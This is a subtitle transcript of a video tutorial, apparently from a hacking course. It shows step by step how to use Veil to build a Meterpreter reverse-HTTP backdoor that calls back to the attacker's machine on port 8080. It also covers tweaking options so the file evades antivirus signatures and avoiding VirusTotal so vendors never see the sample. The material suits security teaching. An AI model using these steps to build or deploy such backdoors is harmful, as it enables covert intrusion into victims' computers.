1
00:00:01,600 --> 00:00:06,940
OK, so in this video we're going to be using Veil to create a backdoor.

2
00:00:07,090 --> 00:00:12,100
So the first thing I'm going to do is I'm going to do "list" to list the available tools, and I'm going

3
00:00:12,100 --> 00:00:15,370
to use number one because we want to use Evasion.

4
00:00:15,820 --> 00:00:22,560
And then I'm going to list my payloads, and like I said in the previous lecture, I want to use go/meterpreter/

5
00:00:22,640 --> 00:00:24,810
rev_http.

6
00:00:24,880 --> 00:00:30,640
So that's number 15, and so I'm going to do "use 15".

7
00:00:30,810 --> 00:00:36,840
And that's going to list... first of all, it's going to show me information about this particular payload

8
00:00:37,200 --> 00:00:41,800
and then it will show me the options that I can set for this payload.

9
00:00:41,820 --> 00:00:47,330
So the main option that you want to set, and the most important one, is the IP address.

10
00:00:47,340 --> 00:00:52,240
So this is the IP address which you're going to be receiving the connections on.

11
00:00:52,320 --> 00:00:57,960
As we said, we're going to have a reverse connection, and we need to set the IP address which the payload

12
00:00:57,990 --> 00:01:04,110
or the backdoor will try to connect back to, and in our case we want to receive the connection back

13
00:01:04,320 --> 00:01:05,850
to this Kali machine.

14
00:01:05,850 --> 00:01:11,680
So we're going to set the LHOST to the IP address of the current Kali machine.

15
00:01:12,270 --> 00:01:16,620
Now to get the IP of my Kali machine I have to run ifconfig.

16
00:01:16,860 --> 00:01:24,970
So I'm going to split the screen by doing right click and clicking on "Split Horizontally", and I'm just going

17
00:01:24,970 --> 00:01:26,240
to bring this down a bit.

18
00:01:27,500 --> 00:01:29,000
And we're going to run it.

19
00:01:33,650 --> 00:01:38,940
Now you can see the IP address in here is 10.20.14.213.
20
00:01:39,050 --> 00:01:44,750
This is the IP of my Kali machine, and this is the IP of the machine that I'm using as the attack machine.

21
00:01:44,750 --> 00:01:47,330
So this is where I want the connection to come back to.

22
00:01:47,390 --> 00:01:51,960
So I can hack the target computer once the backdoor is executed.

23
00:01:52,400 --> 00:02:05,950
So I'm going to set LHOST to 10.20.14.213. So you can set any of these options using the set command.

24
00:02:05,950 --> 00:02:10,780
So all you have to do is write "set" followed by the option that you want to change.

25
00:02:10,780 --> 00:02:19,360
So in this case we want to change the LHOST, and we want to change that to 10.20.14.213.

26
00:02:19,370 --> 00:02:25,330
Now the LPORT is set to 80, which is really good because that's the port that's used by web servers.

27
00:02:25,340 --> 00:02:30,470
So as I said, the connection will look as if the target person is connecting to a website and it's not

28
00:02:30,470 --> 00:02:31,690
going to be suspicious.

29
00:02:32,030 --> 00:02:36,680
But I don't want to use that port because I'll have a web server running on this, and we'll talk about

30
00:02:36,680 --> 00:02:37,740
that later.

31
00:02:37,760 --> 00:02:43,700
So I'm going to change that to 8080. 8080 is another port that's used by web servers.

32
00:02:43,730 --> 00:02:48,290
So it's still not suspicious and it should still bypass firewalls.

33
00:02:48,470 --> 00:02:53,830
So I'm just going to do "set", the same way that we did it before with the LHOST.

34
00:02:53,830 --> 00:03:00,010
We're going to do "set LPORT" to the value that we want to set this option to, and we're going to set it

35
00:03:00,010 --> 00:03:03,350
to 8080.

36
00:03:03,380 --> 00:03:14,320
Now if I do "options" again to list all the options, you'll see that the LHOST changed to 10.20.14.213 and

37
00:03:14,320 --> 00:03:17,960
the LPORT changed to 8080.
38
00:03:17,980 --> 00:03:26,450
Now if you generate the backdoor like this, you will bypass all antivirus programs except AVG.

39
00:03:26,620 --> 00:03:27,670
I've already tried this.

40
00:03:27,670 --> 00:03:29,160
That's how I know this.

41
00:03:29,350 --> 00:03:32,830
And that's not good enough because we want to bypass everything.

42
00:03:33,400 --> 00:03:41,860
Now the way antivirus programs work is they have a very large database of signatures. These signatures

43
00:03:41,860 --> 00:03:45,180
correspond to files that contain harmful code.

44
00:03:45,490 --> 00:03:51,700
So what they do is they compare the signature of your file, of your backdoor, to all the files in this

45
00:03:51,700 --> 00:03:53,250
huge database.

46
00:03:53,350 --> 00:04:00,280
If your file matches any of these files then they'll flag it as a virus or as malware. If it doesn't,

47
00:04:00,460 --> 00:04:08,330
then they'll think that it's a normal file and it's not malware. So the main point in here is we're going

48
00:04:08,330 --> 00:04:15,080
to try to modify the file, our backdoor, as much as possible to make it more unique so that it bypasses

49
00:04:15,080 --> 00:04:21,440
the signature database and we'll be able to bypass antivirus programs. Now as I said, Veil is already

50
00:04:21,440 --> 00:04:22,280
doing that for us.

51
00:04:22,280 --> 00:04:23,890
It's encrypting the backdoor.

52
00:04:23,960 --> 00:04:29,780
It's obfuscating it, it's injecting it into memory so that it doesn't get detected, and it's doing a good

53
00:04:29,780 --> 00:04:30,340
job at it.

54
00:04:30,350 --> 00:04:34,640
It's bypassing pretty much everything except for only one antivirus program.

55
00:04:34,640 --> 00:04:40,490
So just to bypass this last antivirus program I'm going to set some optional options that really won't

56
00:04:40,490 --> 00:04:44,570
make much of a difference; they'll just make the backdoor look a bit different.
57
00:04:45,230 --> 00:04:51,620
So the first thing that I'm going to modify is PROCESSORS, and that's the minimum number of processors

58
00:04:51,620 --> 00:04:53,760
to be used by the backdoor.

59
00:04:53,780 --> 00:04:57,800
I'm not going to set a huge number because that will just make my backdoor not work.

60
00:04:58,070 --> 00:05:02,010
I'm just going to set it to one, which is pretty much nothing really.

61
00:05:02,040 --> 00:05:06,020
But I'm just going to set this option to make the code look a bit different.

62
00:05:06,140 --> 00:05:11,450
So I'm going to do "set" again, the same way that we were setting the LPORT and the LHOST. We're just going

63
00:05:11,450 --> 00:05:19,180
to put the option name, which is PROCESSORS, and we're going to set that to number one.

64
00:05:19,310 --> 00:05:26,170
And I'm also going to set another option, which is the SLEEP option, and that basically lets the backdoor

65
00:05:26,180 --> 00:05:32,120
sleep for a number of seconds that you set before it executes the evil code that you have in there, before

66
00:05:32,140 --> 00:05:34,160
it executes the payload.

67
00:05:34,160 --> 00:05:35,970
So I'm going to set this to six.

68
00:05:36,020 --> 00:05:38,330
Again, no real reason for this.

69
00:05:38,330 --> 00:05:41,390
I'm only doing this to make the backdoor look a bit different.

70
00:05:41,510 --> 00:05:45,830
So I'm going to do "set SLEEP" to six.

71
00:05:46,060 --> 00:05:51,400
So I'm going to hit enter and I'm going to do "options" again to make sure that all the options are set

72
00:05:51,410 --> 00:05:53,190
the way I want them to be.

73
00:05:53,240 --> 00:05:57,980
So I have my IP address set properly.

74
00:05:57,980 --> 00:06:02,500
I have my LPORT, I have my PROCESSORS and I have my SLEEP.

75
00:06:02,750 --> 00:06:07,500
So I'm going to generate the backdoor.

76
00:06:07,560 --> 00:06:10,880
Now it's asking me to name this backdoor or something.
77
00:06:10,890 --> 00:06:21,110
So I'm going to name this rev_http_8080, just so that we can remember which payload and

78
00:06:21,110 --> 00:06:23,720
which port to use for this backdoor in the future.

79
00:06:25,330 --> 00:06:31,350
Now the backdoor is generated, and you can see it's telling us the module that's used and it's telling

80
00:06:31,360 --> 00:06:33,540
us where the backdoor is stored.

81
00:06:33,580 --> 00:06:36,780
So the backdoor is stored in this path right here.

82
00:06:36,910 --> 00:06:40,880
So I'm going to copy that.

83
00:06:40,890 --> 00:06:47,280
Let's go ahead and check to see if the backdoor is detected by any antivirus programs.

84
00:06:47,280 --> 00:06:54,960
Now you can use the built-in feature by using the checkvt command, but this feature only uses the

85
00:06:54,960 --> 00:06:58,180
signature of the file and it's not 100 percent accurate.

86
00:06:58,290 --> 00:07:04,170
Sometimes it tells you that the file will bypass all antiviruses but it'll actually be detected.

87
00:07:04,200 --> 00:07:07,890
You can also use VirusTotal, but I don't recommend that.

88
00:07:07,890 --> 00:07:14,250
And please don't do that, because if you do that your backdoor will become less effective, because VirusTotal

89
00:07:14,250 --> 00:07:18,900
shares the results of their scans with antivirus programs.

90
00:07:18,930 --> 00:07:22,750
What we're going to do is we're going to use a website called NoDistribute.

91
00:07:22,920 --> 00:07:24,080
So we're going to go to it now.

92
00:07:27,950 --> 00:07:32,350
So I'm just going to Google for NoDistribute.

93
00:07:32,540 --> 00:07:35,460
And what this is going to do, it's similar to VirusTotal.

94
00:07:35,540 --> 00:07:40,880
The only difference is it's not going to share these kind of results with antivirus programs.

95
00:07:40,880 --> 00:07:43,380
So it won't affect your backdoor.
96
00:07:43,460 --> 00:07:48,860
So I'm going to click on "Browse" to navigate to my file, and I'm just going to copy where the file is

97
00:07:48,860 --> 00:07:49,250
stored.

98
00:07:49,250 --> 00:07:54,960
So Veil is telling me now it's stored in this location, in /usr/share/veil-output/comp..

99
00:07:55,370 --> 00:08:00,020
So I'm going to copy this and I'm going to come here.

100
00:08:00,020 --> 00:08:09,540
I'm going to click on the pen and I'm going to paste the location. I'm going to click on "Open" and scan

101
00:08:09,540 --> 00:08:14,280
the file.

102
00:08:14,320 --> 00:08:18,730
Now as you can see, I've already scanned this file and it's telling me that this file has been scanned

103
00:08:18,730 --> 00:08:19,510
before.

104
00:08:19,510 --> 00:08:27,760
So I'm just going to click on "View previous results", and as you can see the file was actually scanned

105
00:08:27,760 --> 00:08:32,540
on the same day as today, which is the 29th of March 2017.

106
00:08:32,680 --> 00:08:41,780
And as you can see, the file is bypassing all antivirus programs, so we can use this backdoor against

107
00:08:41,840 --> 00:08:48,830
any device and we'll be sure that the device or the computer will not be able to detect this file as

108
00:08:48,890 --> 00:08:50,480
a virus.

109
00:08:50,480 --> 00:08:52,850
Now there's a few things to keep in mind.

110
00:08:52,910 --> 00:08:58,640
Antivirus programs always update their database and will always update their code as well.

111
00:08:58,640 --> 00:09:02,340
So you want to always keep this all up to date.

112
00:09:02,630 --> 00:09:09,890
Also, sometimes with the same exact backdoor it might get detected and it might not get detected, because

113
00:09:10,100 --> 00:09:16,190
depending on the way the backdoor is getting encrypted and it's getting generated... I've actually generated

114
00:09:16,190 --> 00:09:20,450
this backdoor before with sleep of... with no sleep.
115
00:09:20,450 --> 00:09:26,930
And as I said, it got... it got detected by one antivirus program. Generated within seconds and it still

116
00:09:26,930 --> 00:09:28,720
got detected, and then with six

117
00:09:28,730 --> 00:09:30,880
it was able to bypass it.

118
00:09:30,890 --> 00:09:33,480
So you want to keep playing around with the options.

119
00:09:33,590 --> 00:09:39,680
You want to keep playing around with the payloads until you manage to achieve the best results, so that

120
00:09:39,680 --> 00:09:42,800
you can bypass as many antivirus programs as possible.